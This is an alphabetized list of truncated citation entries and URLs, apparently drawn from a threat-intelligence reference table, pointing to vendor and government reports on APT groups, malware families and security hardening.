Joint Cybe FBI et al. https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf
Joint Cybe NSA et al. https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
Juniper DAJuniper. ( https://www.juniper.net/documentation/en_US/junos/topics/task/configuration/understanding-and-us
Juniper Ic Kimayong, https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedi
KISA OperaKISA. (202 https://web.archive.org/web/20220328121326/https://boho.or.kr/filedownload.do?attach_file_seq=26
Kali Hydra Kali. (201 https://tools.kali.org/password-attacks/hydra
Kandji Cuc Kohler, A. https://www.kandji.io/blog/malware-cuckoo-infostealer-spyware
Kaspersky Global Resehttps://securelist.com/apt-trends-report-q1-2020/96826/
Kaspersky GReAT . (20https://securelist.com/apt-trends-report-q1-2021/101967
Kaspersky Kamluk, V. https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindP
Kaspersky Park, S. (2 https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
Kaspersky Zykov, K. https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_A
Kaspersky GReAT. (201 https://securelist.com/recent-cloud-atlas-activity/92016/
Kaspersky GReAT. (201 https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_k
Kaspersky Slepogin, Nhttps://securelist.com/dridex-a-history-of-evolution/78531/
Kaspersky Kaspersky Lhttps://web.archive.org/web/20150906233433/https://securelist.com/files/2015/06/The_Mystery_of_D
Kaspersky Shulmin, A.https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_gr
Kaspersky GReAT. (202 https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/
Kaspersky Gostev, A. https://securelist.com/the-flame-questions-and-answers-51/34344/
Kaspersky Gostev, A. https://securelist.com/flame-bunny-frog-munch-and-beetlejuice-2/32855/
Kaspersky Kaspersky Lhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-la
Kaspersky Bettencourhttps://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging
Kaspersky GReAT. (201 https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Un
Kaspersky Global Resehttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-Project
Kaspersky Lechtik, M,https://securelist.com/apt-luminousmoth/103332/
Kaspersky Kayal, A. https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf
Kaspersky GReAT. (20https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/
Kaspersky Kaspersky Lhttp://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf
Kaspersky Kaspersky Lhttps://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionag
Kaspersky Kaspersky https://securelist.com/faq-the-projectsauron-apt/75533/
Kaspersky Kaspersky Lhttps://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf
Kaspersky Kaspersky Lhttps://securelist.com/files/2016/07/The-ProjectSauron-APT_Technical_Analysis_KL.pdf
Kaspersky Kuzmenko,https://securelist.com/qakbot-technical-analysis/103931/
A
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_L
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad
Kaspersky Mamedov,https://securelist.com/sodin-ransomware/91473/
O,
Kaspersky Kaspersky Lhttps://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Sha
Kaspersky GReAT. (201 https://securelist.com/project-tajmahal/90240/
Kaspersky Vyacheslavhttps://securelist.com/lazarus-threatneedle/100803/
Kaspersky Dedola, G. https://securelist.com/toddycat-keep-calm-and-check-logs/110696/
Kaspersky Dedola, G. https://securelist.com/toddycat/106799/
Kaspersky Kwiatkoswki https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/
Kaspersky Dedola, G. https://securelist.com/transparent-tribe-part-1/98127/
Kaspersky Kaspersky Lhttps://securelist.com/the-epic-turla-operation/65545/
Kaspersky Kaspersky https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Tu
Kaspersky Baumgartner https://securelist.com/the-penquin-turla-2/67962/
Kaspersky Yamout, M.https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/10504
Kaspersky Kaspersky Lhttps://securelist.com/winnti-more-than-just-a-game/37029/
Kerberos GAdepts of https://adepts.of0x.cc/kerberos-thievery-linux/
Kernel SelfKernel.org.https://www.kernel.org/doc/html/latest/security/self-protection.html
Kernel.org Vander Stoe https://patchwork.kernel.org/patch/8754821/
Kersten AkMax Kerstehttps://www.trellix.com/blogs/research/akira-ransomware/
Kifarunix - Koromicha.https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/
KillDisk R Catalin Ci https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-com
Kimsuky MHossein Ja https://www.malwarebytes.com/blog/threat-intelligence/2021/06/kimsuky-apt-continues-to-target-sou
Korean FSIFinancial S https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&sear
Kroll Qakb Sette, N. e https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijack
Kroll RawPNesbit, B. https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware
Kroll Roya Iacono, L. https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive
KubernetesThe Kuberne https://kubernetes.io/docs/concepts/security/controlling-access/
KubernetesKubernetes. https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers
KubernetesKubernetes. https://kubernetes.io/docs/concepts/security/overview/
KubernetesNational Sehttps://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDAN
Kubernete Kubernetes. https://kubernetes.io/docs/concepts/security/rbac-good-practices/
KubernetesKubernetes. https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
KubernetesKubernetes. https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/
LKM loading Pingios, A. https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/
LOLBAS CerLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Certutil/
LOLBAS EseLOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Esentutl/
LOLBAS Ex LOLBAS. (n.https://lolbas-project.github.io/lolbas/Binaries/Expand/
Lab52 WIRTS2 Grupo. (https://lab52.io/blog/wirte-group-attacking-the-middle-east/
Lacework Stroud, J. https://www.lacework.com/blog/taking-teamtnt-docker-images-offline
Lastline DaArunpreet https://www.lastline.com/labsblog/defeating-darkhotel-just-in-time-decryption/
S
Lastline Pl Vasilenko, http://labs.lastline.com/an-analysis-of-plugx
LatrodectuProofpointhttps://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
Lazarus APSaini, A. a https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-window
Lazarus R Lei, C., et https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencie
Lee 2013 Lee, T., Ha https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-p
Leonard T Billy Leonahttps://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
Leonardo TLeonardo. https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%
Linux FTP N/A. (n.d.) https://linux.die.net/man/1/ftp
Linux at IEEE/The Ohttps://man7.org/linux/man-pages/man1/at.1p.html
LogRhythmNoerenberg, https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/
Logpoint PSwachchhan https://www.logpoint.com/wp-content/uploads/2024/02/logpoint-etpr-pikabot.pdf
Lookout DaBlaich, A., https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
Lotus Blos Falcone, R.http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lo
Lotus Blos Falcone, R.https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html
Lumen KVBBlack Lotushttps://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/
Lumen VerBlack Lotushttps://blog.lumen.com/taking-the-crossroads-the-versa-director-zero-day-exploitation/
Lunghi IronDaniel Lunghttps://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
MAR10135US-CERT. ( https://web.archive.org/web/20220529212912/https://www.cisa.gov/uscert/sites/default/files/publicati
MAR10135US-CERT. ( https://web.archive.org/web/20210709132313/https://us-cert.cisa.gov/sites/default/files/publications/
MDMProfilApple. (201https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
MDSec BrutChell, D. https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/
MFA FatiguJessica Hawhttps://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to
MRWLabs Of Knowles, W. https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
MS14-025 Microsoft. https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences
MS17-010 Microsoft. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
MSRC NobeMSRC. (202https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/
MSTIC DEVMSTIC, DARhttps://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations
MSTIC FogRamin Nafihttps://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-
MSTIC NOBNafisi, R., https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-m
MSTIC NOBMicrosoft https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nob
MSTIC NobMicrosoft Thttps://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-pr
MSTIC Nobe MSTIC. (20https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-too
MSTIC OctoMicrosoft. https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facili
MacKeeperSushko, O. https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/
MagicWebMicrosoft https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-
Malicious DAzure Edgehttps://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft
Malware An US-CERT. ( https://web.archive.org/web/20200324152106/https://www.us-cert.gov/sites/default/files/publications
MalwareByt Jazi, H. (2 https://blog.malwarebytes.com/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within
MalwareByt Jazi, H. (2 https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf
MalwareByt Segura, J. https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fak
MalwareByt Threat Intehttps://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payload
MalwareByMalwareByt https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malw
MalwareTeMalwareTec https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html
Malwarebyt Jazi, H. (2 https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/
Malwarebyt Hasherezade https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-s
Malwarebyt Reed, Thoma https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-p
MalwarebyKujawa, A. https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/
Malwarebyhasherezadhttps://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/
MalwarebySmith, A.. https://support.malwarebytes.com/docs/DOC-2295
Malwarebyt Malwarebyte https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/
Malwarebyt Threat Intehttps://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper
Malwarebyt Santos, R. https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/
MalwarebytJazi, H. (2 https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean
MalwarebytThreat Intehttps://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-cam
Malwarebythasherezade https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-h
MalwarebytJazi, Hosse https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba
MalwarebytHasherezade https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/
MalwarebytMalwarebyte https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
MalwarebyHasherezadhttps://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescree
MalwarebytMalwarebyt https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attac
Mandiant -Bill Hau, T https://www.mandiant.com/resources/synful-knock-acis
Mandiant Mandiant. https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
(
Mandiant Mandiant. https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
(
Mandiant AMandiant. https://www.mandiant.com/resources/blog/unc3524-eye-spy-email
Mandiant ADouglas Biehttps://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft
Mandiant AWolfram, J.https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns
Mandiant Rufus Browhttps://www.mandiant.com/resources/apt41-us-state-governments
Mandiant Mandiant. https://services.google.com/fh/files/misc/apt43-report-en.pdf
Mandiant AMandiant. https://www.mandiant.com/resources/insights/apt-groups
(
Mandiant AMike Burnshttps://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
Mandiant Adrien Bat https://www.mandiant.com/resources/blog/azure-run-command-dummies
Mandiant CPany, D. & https://www.mandiant.com/resources/blog/cloud-bad-log-configurations
Mandiant CMcLellan, Thttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day
Mandiant CLin, M. et https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation
Mandiant CLin, M. et https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence
Mandiant Mandiant. https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to
Mandiant FShilko, J., https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf
Mandiant FTa, V., et https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico
Mandiant FBromiley, M https://www.youtube.com/watch?v=fevGZs0EQu8
Mandiant FAbdo, B., ehttps://www.mandiant.com/resources/evolution-of-fin7
Mandiant Mandiant. https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
Mandiant Mandiant. https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
(
Mandiant NDunwoody,https://www.slideshare.net/slideshow/no-easy-breach-derby-con-2016/66447908
Mandiant Villeneuve,https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreig
Mandiant PPerez, D. e https://www.mandiant.com/resources/blog/updates-on-chinese-apt-compromising-pulse-secure-vpn-de
Mandiant PPerez, D. e https://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-sec
Mandiant Jenkins, L. https://cloud.google.com/blog/topics/threat-intelligence/likely-iranian-threat-actor-conducts-politically-
Mandiant RMandiant. https://www.mandiant.com/sites/default/files/2022-08/remediation-hardening-strategies-for-m365-de
Mandiant SHawley, S. https://www.mandiant.com/resources/blog/turla-galaxy-opportunity
Mandiant Tomcik, R. https://www.mandiant.com/resources/telegram-malware-iranian-espionage
Mandiant Mandiant Ishttps://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping
Mandiant- Ken Proskahttps://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology
Mandiant_Mandiant In https://cloud.google.com/blog/topics/threat-intelligence/unc2165-shifts-to-evade-sanctions/
McAfee APSherstobitohttps://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-atta
McAfee APPaganini, http://securityaffairs.co/wordpress/65318/hacking/dde-attack-apt28.html
McAfee BabMundo, A. https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf
e
McAfee BaSherstobitohttps://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-
McAfee Cub Roccio, T., https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf
McAfee Di Roccia, T., https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf
McAfee Gho Sherstobitohttps://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-st
McAfee GoSherstobitohttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attack
McAfee HoSherstobit https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicio
McAfee LazCashman, M https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-go
McAfee LazBeek, C. ( https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/
McAfee LazSherstobitohttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoi
McAfee MaMundo, A. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
McAfee NeMcAfee. (2https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/
McAfee NigMcAfee® Fo https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20G
McAfee Oce Sherstobit https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf
McAfee REv Saavedra-Mo https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-rans
McAfee SaLi, H. (201 https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-o
McAfee ShMundo, A.,https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-
McAfee ShRoccia, T., https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-w
McAfee ShSherstobitohttps://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf
McAfee Sod McAfee. (2https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-rans
McAfee-Gho Ryan Shersthttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks
Mcafee CloMundo, A. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/
Medium AliSalem, A. ( https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-conne
Medium Anc Grange, W.https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30
Medium BaSebdraven.https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62
Medium EliSalem, E. ( https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083
Medium KOKarmi, D. ( https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b
Medium Me Erlich, C. https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-ava
Medium S2S2W. (2022, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158
Metabase Q Garcia, F., https://www.metabaseq.com/mispadu-banking-trojan/
Metcalf 20Metcalf, S. http://adsecurity.org/?p=1275
